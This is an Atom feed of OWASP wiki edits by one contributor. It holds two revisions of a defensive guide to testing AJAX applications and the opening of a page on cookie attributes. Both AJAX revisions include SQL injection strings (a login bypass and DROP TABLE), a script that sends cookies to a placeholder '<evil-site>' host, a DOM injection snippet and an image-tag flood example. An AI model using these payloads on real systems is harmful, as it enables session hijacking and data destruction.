<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Bregolin</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Bregolin"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/Bregolin"/>
		<updated>2026-05-09T07:31:31Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_AJAX_Vulnerabilities_(OWASP-AJ-001)&amp;diff=37272</id>
		<title>Testing for AJAX Vulnerabilities (OWASP-AJ-001)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_AJAX_Vulnerabilities_(OWASP-AJ-001)&amp;diff=37272"/>
				<updated>2008-08-26T13:52:19Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Browser Based Attacks */  Modified wording, which was too strong &amp;quot;The web browsers we use have not been designed with security in mind&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a traditional (i.e., &amp;quot;pre-web&amp;quot;) application. Since AJAX is still a new technology, there are many security issues that have not yet been fully researched. Some of the security issues in AJAX include:&lt;br /&gt;
&lt;br /&gt;
* Increased attack surface with many more inputs to secure&lt;br /&gt;
* Exposed internal functions of the application&lt;br /&gt;
* Client access to third-party resources with no built-in security and encoding mechanisms&lt;br /&gt;
* Failure to protect authentication information and sessions&lt;br /&gt;
* Blurred line between client-side and server-side code, possibly resulting in security mistakes&lt;br /&gt;
&lt;br /&gt;
== Attacks and Vulnerabilities == &lt;br /&gt;
&lt;br /&gt;
===XMLHttpRequest Vulnerabilities===&lt;br /&gt;
&lt;br /&gt;
AJAX uses the XMLHttpRequest (XHR) object for all communication with a server-side application, frequently a web service. A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, JavaScript Object Notation ([http://www.json.org JSON]), image data, or anything else that JavaScript can process.&amp;lt;p&amp;gt;&lt;br /&gt;
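The round trip just described can be sketched in a few lines (a sketch only: the /getdata endpoint, the query parameter, and the handleReply helper are illustrative names, not part of the article):

```javascript
// Pure helper, also usable outside a browser: process a JSON reply.
function handleReply(responseText) {
  var data = JSON.parse(responseText);
  return data.items.length;
}

// Browser-only part, guarded so the sketch is inert elsewhere.
if (typeof XMLHttpRequest !== 'undefined') {
  var xhr = new XMLHttpRequest();
  xhr.open('GET', '/getdata?id=42', true);   // same-origin URL, per the text
  xhr.onreadystatechange = function () {
    if (xhr.readyState === 4) {              // 4 = DONE
      console.log(handleReply(xhr.responseText));
    }
  };
  xhr.send(null);
}

console.log(handleReply('{"items": [1, 2, 3]}'));  // 3
```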
&lt;br /&gt;
If an AJAX page is accessed over a non-SSL connection, the subsequent XMLHttpRequest calls are not SSL encrypted either; hence, login data traverses the wire in clear text. Using the secure HTTPS/SSL channels that modern browsers support is the easiest way to prevent such attacks.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
XMLHttpRequest (XHR) calls carry user- or attacker-influenced input to the server like any other request, so they can become a vector for various other attacks, such as SQL Injection and Cross-Site Scripting (XSS).&lt;br /&gt;
&lt;br /&gt;
===Increased Attack Surface===&lt;br /&gt;
&lt;br /&gt;
Unlike traditional web applications that execute entirely on the server, AJAX applications extend across the client and the server, giving the client real processing responsibilities. This introduces additional places where malicious content can potentially be injected.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===SQL Injection===&lt;br /&gt;
&lt;br /&gt;
SQL Injection attacks (see [[Testing_for_SQL_Injection]]) are remote attacks on the database in which the attacker modifies SQL statements before they are processed by the DBMS. &amp;lt;br&amp;gt; Typical SQL Injection attacks are shown below (the examples refer to Microsoft SQL Server).&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*'''''Example 1'''''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This query will always return one row (unless the table is empty), and it is likely to be the first entry in the table. For many applications, that entry is the administrative login - the one with the most privileges.&amp;lt;br&amp;gt;&lt;br /&gt;
Note: the code fragment above tries to match the user ID and password values (obtained as input) against the ''name'' and ''pass'' attributes of ''users''; consequently, it appears that ''users'' stores passwords in clear text, a practice which is not recommended.&amp;lt;br&amp;gt;&lt;br /&gt;
*'''''Example 2'''''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
The above set of SQL statements drops the table ''users'', causing a Denial of Service. This is possible on DBMSs that allow the concatenation of multiple statements.&amp;lt;br&amp;gt;&lt;br /&gt;
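Both examples above typically arise from building the SQL string by concatenation. A minimal sketch of how that happens (buildLoginQuery is a hypothetical helper, not from any real library):

```javascript
// Naive query construction: user input is pasted straight into the SQL text.
function buildLoginQuery(name, pass) {
  return "SELECT id FROM users WHERE name='" + name +
         "' AND pass='" + pass + "' LIMIT 1;";
}

// Benign input produces the intended query.
console.log(buildLoginQuery('alice', 's3cret'));

// Input containing a quote rewrites the WHERE clause, as in Example 1;
// the trailing -- comments out the rest of the statement.
console.log(buildLoginQuery("' OR 1=1 --", 'x'));
// SELECT id FROM users WHERE name='' OR 1=1 --' AND pass='x' LIMIT 1;
```

Parameterized queries, which keep user input out of the SQL text entirely, are the standard defence.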
&lt;br /&gt;
&lt;br /&gt;
===Cross Site Scripting===&lt;br /&gt;
&lt;br /&gt;
Cross Site Scripting is a technique by which malicious content is injected in the form of HTML/JavaScript code. XSS exploits can be used to trigger various other attacks, such as cookie theft, account hijacking, phishing, and denial of service.&lt;br /&gt;
&lt;br /&gt;
Regular browser requests and AJAX requests look identical, so the server is unable to classify them and thus cannot discern which requests were made in the background. A JavaScript program can use AJAX to request a resource in the background, without the user's knowledge. The browser automatically adds the necessary authentication or state-keeping information, such as cookies, to the request. JavaScript code can then access the response to this hidden request and send further requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site Scripting (XSS) attack.&lt;br /&gt;
&lt;br /&gt;
Also, an XSS attack could send requests for specific pages other than the page the user is currently looking at. This allows the attacker to actively search for certain content and potentially access the data.&lt;br /&gt;
&lt;br /&gt;
The XSS payload can use AJAX requests to autonomously inject itself into pages and easily re-inject the same host with more XSS (like a virus), all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods to propagate itself invisibly to the user. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*'''''Examples''''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;howdy&amp;quot;)&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;document.location='http://www.example.com/pag.pl?'%20+document.cookie&amp;lt;/script&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Usage:''&lt;br /&gt;
&amp;lt;pre&amp;gt;http://example.com/login.php?variable=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;document.location='http://&amp;lt;evil-site&amp;gt;/cont.php?'+document.cookie&amp;lt;/script&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
This simply redirects the browser to an unknown, malicious page after the user logs into the original page from which the request was made.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Client Side Injection Threats===&lt;br /&gt;
&lt;br /&gt;
* ''XSS exploits'' can give access to sensitive client-side data and can also modify client-side code.&lt;br /&gt;
* ''DOM Injection'' is a type of XSS injection that happens through the sub-objects document.location, document.URL, or document.referrer of the Document Object Model (DOM).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;&lt;br /&gt;
var pos=document.URL.indexOf(&amp;quot;name=&amp;quot;)+5;&lt;br /&gt;
document.write(document.URL.substring(pos,document.URL.length));&lt;br /&gt;
&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
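As a defensive counterpart to the DOM injection snippet above, a minimal sketch (the function name and whitelist are illustrative assumptions) of validating the extracted value before writing it into the page:

```javascript
// Whitelist validation: accept the URL-derived value only if it is made of
// characters that cannot break out into markup or script context.
function isSafeName(value) {
  // Allow only letters, digits, dot, dash and underscore.
  return /^[A-Za-z0-9._-]+$/.test(value);
}

console.log(isSafeName('alice'));            // true
console.log(isSafeName('"onload="evil()'));  // false
```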
&lt;br /&gt;
===AJAX Bridging===&lt;br /&gt;
&lt;br /&gt;
For security purposes, AJAX applications can only connect back to the Website from which they come. For example, JavaScript with AJAX downloaded from ''site1.com'' cannot make connections to ''site2.com''. To allow AJAX to contact third-party sites in this manner, the AJAX service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site. A bridge could be considered a 'Web service to Web service' connection. An attacker could use this to access sites with restricted access.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Cross Site Request Forgery (CSRF)===&lt;br /&gt;
&lt;br /&gt;
CSRF (see [[Testing for CSRF]]) attacks occur when an attacker forces a victim’s web browser to send an HTTP request to any website of his choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. If such applications are vulnerable, CSRF could have invisibly transferred funds, posted comments, compromised email lists, or reconfigured the network. A characteristic of CSRF attacks is that the vulnerable application's logs will show what appear to be legitimate entries originating from the victim, bearing no trace of the attack. This attack, though not common, has been performed before. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Denial of Service===&lt;br /&gt;
&lt;br /&gt;
Denial of Service is an old attack in which an attacker or a vulnerable application forces the user's browser to launch multiple XMLHttpRequests against a target application, against the user's wishes. In fact, browser domain restrictions make XMLHttpRequests of little use for launching such attacks on other domains; simple tricks, such as image tags nested within a JavaScript loop, do the job more effectively. AJAX, being on the client side, makes the attack easier.&amp;lt;pre&amp;gt;&amp;lt;IMG SRC=&amp;quot;http://example.com/cgi-bin/ouch.cgi?a=b&amp;quot;&amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
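The image-tag trick can be sketched as follows (a sketch only: the helper name is illustrative, and in a real browser each generated URL would be assigned to a new Image().src so that the browser fires a GET regardless of what the server returns):

```javascript
// Generate the flood of request URLs a malicious loop would make the
// victim's browser issue against the target.
function floodUrls(base, count) {
  var urls = [];
  for (var i = 0; count > i; i = i + 1) {
    // A unique query string defeats the browser cache,
    // so every request actually reaches the server.
    urls.push(base + '?nocache=' + i);
  }
  return urls;
}

console.log(floodUrls('http://example.com/cgi-bin/ouch.cgi', 3));
```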
&lt;br /&gt;
===Memory leaks===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Browser Based Attacks===&lt;br /&gt;
&lt;br /&gt;
The security of web browsers depends to a great extent on the fact that these tools integrate disparate technologies (such as HTML, JavaScript, and DNS, to name a few) whose interoperability has often been achieved without much focus on its security implications. Furthermore, most of the security features available in browsers are based on previous attacks, so our browsers are not prepared for newer ones.&lt;br /&gt;
&lt;br /&gt;
There have been a number of new attacks on browsers, such as using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These could be computers that serve Web pages, but they could also include routers, printers, IP phones, and other networked devices or applications that have a Web interface. The JavaScript scanner determines whether there is a computer at an IP address by sending a &amp;quot;ping&amp;quot; using JavaScript &amp;quot;image&amp;quot; objects. It then determines which servers are running by looking for image files stored in standard places and analyzing the traffic and error messages it receives back. &lt;br /&gt;
&lt;br /&gt;
Attacks that target Web browser and Web application vulnerabilities are often conducted over HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. In addition, the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.&lt;br /&gt;
&lt;br /&gt;
== Major Attacks  ==&lt;br /&gt;
&lt;br /&gt;
'''MySpace Attack'''&lt;br /&gt;
&lt;br /&gt;
The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In the case of Samy (see [http://namb.la/popular/tech.html Technical explanation of The MySpace Worm]), MySpace input validation controls prevented the injection of ''&amp;lt;SCRIPT&amp;gt;'' tags but failed to consider all HTML tags, such as ''DIV''. The article is a good example of how hard it is to perform input validation (particularly when following a ''black list'' based approach). AJAX was used to inject a worm into the MySpace profile of any user viewing the infected page and forced that user to add the user “Samy” to his friends list. It also appended the words “Samy is my hero” to the victim's profile.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Yahoo! Mail Attack'''&lt;br /&gt;
&lt;br /&gt;
In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and AJAX, took advantage of a vulnerability in Yahoo Mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the Yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which made it look like an email from a known user.&lt;br /&gt;
&lt;br /&gt;
== References == &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&lt;br /&gt;
&lt;br /&gt;
* Brian Chess, Yekaterina Tsipenyuk O'Neil, Jacob West, &amp;quot;JavaScript Hijacking&amp;quot; - http://www.fortify.com/servlet/downloads/public/JavaScript_Hijacking.pdf&amp;lt;br&amp;gt;&lt;br /&gt;
* Billy Hoffman, &amp;quot;Ajax(in) Security&amp;quot; - http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf &amp;lt;br&amp;gt;&lt;br /&gt;
* Billy Hoffman, &amp;quot;Analysis of Web Application Worms and Viruses&amp;quot;, SPI Labs - http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf&amp;lt;br&amp;gt;&lt;br /&gt;
* Billy Hoffman, &amp;quot;Ajax Security Dangers&amp;quot;, SPI Labs - http://www.spidynamics.com/assets/documents/AJAXdangers.pdf&amp;lt;br&amp;gt;&lt;br /&gt;
* Jesse James Garrett, &amp;quot;Ajax: A New Approach to Web Applications&amp;quot;, Adaptive Path - http://www.adaptivepath.com/publications/essays/archives/000385.php&amp;lt;br&amp;gt;&lt;br /&gt;
* [http://en.wikipedia.org/wiki/AJAX AJAX]&amp;lt;br&amp;gt;&lt;br /&gt;
* [http://ajaxpatterns.org AJAX Patterns]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AJAX Security Project]]&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_AJAX_Vulnerabilities_(OWASP-AJ-001)&amp;diff=37271</id>
		<title>Testing for AJAX Vulnerabilities (OWASP-AJ-001)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_AJAX_Vulnerabilities_(OWASP-AJ-001)&amp;diff=37271"/>
				<updated>2008-08-26T13:41:54Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: Several corrections and clarifications, following email exchange with M. Meucci&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a traditional (i.e., &amp;quot;pre-web&amp;quot;) application. Since AJAX is still a new technology, there are many security issues that have not yet been fully researched. Some of the security issues in AJAX include:&lt;br /&gt;
&lt;br /&gt;
* Increased attack surface with many more inputs to secure&lt;br /&gt;
* Exposed internal functions of the application&lt;br /&gt;
* Client access to third-party resources with no built-in security and encoding mechanisms&lt;br /&gt;
* Failure to protect authentication information and sessions&lt;br /&gt;
* Blurred line between client-side and server-side code, possibly resulting in security mistakes&lt;br /&gt;
&lt;br /&gt;
== Attacks and Vulnerabilities == &lt;br /&gt;
&lt;br /&gt;
===XMLHttpRequest Vulnerabilities===&lt;br /&gt;
&lt;br /&gt;
AJAX uses the XMLHttpRequest (XHR) object for all communication with a server-side application, frequently a web service. A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, JavaScript Object Notation ([http://www.json.org JSON]), image data, or anything else that JavaScript can process.&amp;lt;p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an AJAX page is accessed over a non-SSL connection, the subsequent XMLHttpRequest calls are not SSL encrypted either; hence, login data traverses the wire in clear text. Using the secure HTTPS/SSL channels that modern browsers support is the easiest way to prevent such attacks.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
XMLHttpRequest (XHR) calls carry user- or attacker-influenced input to the server like any other request, so they can become a vector for various other attacks, such as SQL Injection and Cross-Site Scripting (XSS).&lt;br /&gt;
&lt;br /&gt;
===Increased Attack Surface===&lt;br /&gt;
&lt;br /&gt;
Unlike traditional web applications that execute entirely on the server, AJAX applications extend across the client and the server, giving the client real processing responsibilities. This introduces additional places where malicious content can potentially be injected.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===SQL Injection===&lt;br /&gt;
&lt;br /&gt;
SQL Injection attacks (see [[Testing_for_SQL_Injection]]) are remote attacks on the database in which the attacker modifies SQL statements before they are processed by the DBMS. &amp;lt;br&amp;gt; Typical SQL Injection attacks are shown below (the examples refer to Microsoft SQL Server).&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*'''''Example 1'''''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This query will always return one row (unless the table is empty), and it is likely to be the first entry in the table. For many applications, that entry is the administrative login - the one with the most privileges.&amp;lt;br&amp;gt;&lt;br /&gt;
Note: the code fragment above tries to match the user ID and password values (obtained as input) against the ''name'' and ''pass'' attributes of ''users''; consequently, it appears that ''users'' stores passwords in clear text, a practice which is not recommended.&amp;lt;br&amp;gt;&lt;br /&gt;
*'''''Example 2'''''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
The above set of SQL statements drops the table ''users'', causing a Denial of Service. This is possible on DBMSs that allow the concatenation of multiple statements.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Cross Site Scripting===&lt;br /&gt;
&lt;br /&gt;
Cross Site Scripting is a technique by which malicious content is injected in the form of HTML/JavaScript code. XSS exploits can be used to trigger various other attacks, such as cookie theft, account hijacking, phishing, and denial of service.&lt;br /&gt;
&lt;br /&gt;
Regular browser requests and AJAX requests look identical, so the server is unable to classify them and thus cannot discern which requests were made in the background. A JavaScript program can use AJAX to request a resource in the background, without the user's knowledge. The browser automatically adds the necessary authentication or state-keeping information, such as cookies, to the request. JavaScript code can then access the response to this hidden request and send further requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site Scripting (XSS) attack.&lt;br /&gt;
&lt;br /&gt;
Also, an XSS attack could send requests for specific pages other than the page the user is currently looking at. This allows the attacker to actively search for certain content and potentially access the data.&lt;br /&gt;
&lt;br /&gt;
The XSS payload can use AJAX requests to autonomously inject itself into pages and easily re-inject the same host with more XSS (like a virus), all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods to propagate itself invisibly to the user. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*'''''Examples''''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;howdy&amp;quot;)&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;document.location='http://www.example.com/pag.pl?'%20+document.cookie&amp;lt;/script&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Usage:''&lt;br /&gt;
&amp;lt;pre&amp;gt;http://example.com/login.php?variable=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;document.location='http://&amp;lt;evil-site&amp;gt;/cont.php?'+document.cookie&amp;lt;/script&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
This simply redirects the browser to an unknown, malicious page after the user logs into the original page from which the request was made.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Client Side Injection Threats===&lt;br /&gt;
&lt;br /&gt;
* ''XSS exploits'' can give access to sensitive client-side data and can also modify client-side code.&lt;br /&gt;
* ''DOM Injection'' is a type of XSS injection that happens through the sub-objects document.location, document.URL, or document.referrer of the Document Object Model (DOM).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;&lt;br /&gt;
var pos=document.URL.indexOf(&amp;quot;name=&amp;quot;)+5;&lt;br /&gt;
document.write(document.URL.substring(pos,document.URL.length));&lt;br /&gt;
&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===AJAX Bridging===&lt;br /&gt;
&lt;br /&gt;
For security purposes, AJAX applications can only connect back to the Website from which they come. For example, JavaScript with AJAX downloaded from ''site1.com'' cannot make connections to ''site2.com''. To allow AJAX to contact third-party sites in this manner, the AJAX service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site. A bridge could be considered a 'Web service to Web service' connection. An attacker could use this to access sites with restricted access.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Cross Site Request Forgery (CSRF)===&lt;br /&gt;
&lt;br /&gt;
CSRF (see [[Testing for CSRF]]) attacks occur when an attacker forces a victim’s web browser to send an HTTP request to any website of his choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. If such applications are vulnerable, CSRF could have invisibly transferred funds, posted comments, compromised email lists, or reconfigured the network. A characteristic of CSRF attacks is that the vulnerable application's logs will show what appear to be legitimate entries originating from the victim, bearing no trace of the attack. This attack, though not common, has been performed before. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Denial of Service===&lt;br /&gt;
&lt;br /&gt;
Denial of Service is an old attack in which an attacker or a vulnerable application forces the user's browser to launch multiple XMLHttpRequests against a target application, against the user's wishes. In fact, browser domain restrictions make XMLHttpRequests of little use for launching such attacks on other domains; simple tricks, such as image tags nested within a JavaScript loop, do the job more effectively. AJAX, being on the client side, makes the attack easier.&amp;lt;pre&amp;gt;&amp;lt;IMG SRC=&amp;quot;http://example.com/cgi-bin/ouch.cgi?a=b&amp;quot;&amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
===Memory leaks===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Browser Based Attacks===&lt;br /&gt;
&lt;br /&gt;
The web browsers we use have not been designed with security in mind. Most of the security features available in browsers are based on previous attacks, so our browsers are not prepared for newer ones.&lt;br /&gt;
&lt;br /&gt;
There have been a number of new attacks on browsers, such as using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These could be computers that serve Web pages, but they could also include routers, printers, IP phones, and other networked devices or applications that have a Web interface. The JavaScript scanner determines whether there is a computer at an IP address by sending a &amp;quot;ping&amp;quot; using JavaScript &amp;quot;image&amp;quot; objects. It then determines which servers are running by looking for image files stored in standard places and analyzing the traffic and error messages it receives back. &lt;br /&gt;
&lt;br /&gt;
Attacks that target Web browser and Web application vulnerabilities are often conducted over HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. In addition, the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.&lt;br /&gt;
&lt;br /&gt;
== Major Attacks  ==&lt;br /&gt;
&lt;br /&gt;
'''MySpace Attack'''&lt;br /&gt;
&lt;br /&gt;
The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In the case of Samy (see [http://namb.la/popular/tech.html Technical explanation of The MySpace Worm]), MySpace input validation controls prevented the injection of ''&amp;lt;SCRIPT&amp;gt;'' tags but failed to consider all HTML tags, such as ''DIV''. The article is a good example of how hard it is to perform input validation (particularly when following a ''black list'' based approach). AJAX was used to inject a worm into the MySpace profile of any user viewing the infected page and forced that user to add the user “Samy” to his friends list. It also appended the words “Samy is my hero” to the victim's profile.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Yahoo! Mail Attack'''&lt;br /&gt;
&lt;br /&gt;
In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and AJAX, took advantage of a vulnerability in Yahoo Mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the Yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which made it look like an email from a known user.&lt;br /&gt;
&lt;br /&gt;
== References == &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&lt;br /&gt;
&lt;br /&gt;
* Brian Chess, Yekaterina Tsipenyuk O'Neil, Jacob West, &amp;quot;JavaScript Hijacking&amp;quot; - http://www.fortify.com/servlet/downloads/public/JavaScript_Hijacking.pdf&amp;lt;br&amp;gt;&lt;br /&gt;
* Billy Hoffman, &amp;quot;Ajax(in) Security&amp;quot; - http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf &amp;lt;br&amp;gt;&lt;br /&gt;
* Billy Hoffman, &amp;quot;Analysis of Web Application Worms and Viruses&amp;quot;, SPI Labs - http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf&amp;lt;br&amp;gt;&lt;br /&gt;
* Billy Hoffman, &amp;quot;Ajax Security Dangers&amp;quot;, SPI Labs - http://www.spidynamics.com/assets/documents/AJAXdangers.pdf&amp;lt;br&amp;gt;&lt;br /&gt;
* Jesse James Garrett, &amp;quot;Ajax: A New Approach to Web Applications&amp;quot;, Adaptive Path - http://www.adaptivepath.com/publications/essays/archives/000385.php&amp;lt;br&amp;gt;&lt;br /&gt;
* [http://en.wikipedia.org/wiki/AJAX AJAX]&amp;lt;br&amp;gt;&lt;br /&gt;
* [http://ajaxpatterns.org AJAX Patterns]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AJAX Security Project]]&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_cookies_attributes_(OTG-SESS-002)&amp;diff=33584</id>
		<title>Testing for cookies attributes (OTG-SESS-002)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_cookies_attributes_(OTG-SESS-002)&amp;diff=33584"/>
				<updated>2008-07-07T10:39:11Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: Minor corrections affecting syntax.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
'''This is a draft of a section of the new Testing Guide v3'''&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Cookies are often a key attack vector for malicious users (typically targeting other users), so the application should always exercise due diligence to protect them. In this section we will look at how an application can take the necessary precautions when assigning cookies, and how to test that these attributes have been correctly configured. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The importance of cookies and their secure use cannot be overstated, especially within dynamic web applications, which need to maintain state across a stateless protocol such as HTTP.  To understand why cookies matter, it helps to understand what they are primarily used for: as session authorization/authentication tokens and as temporary data containers.  If an attacker is able to acquire a session token, for example through cross-site scripting (XSS) or by sniffing an unencrypted session, he or she can use that cookie to hijack a valid session.&lt;br /&gt;
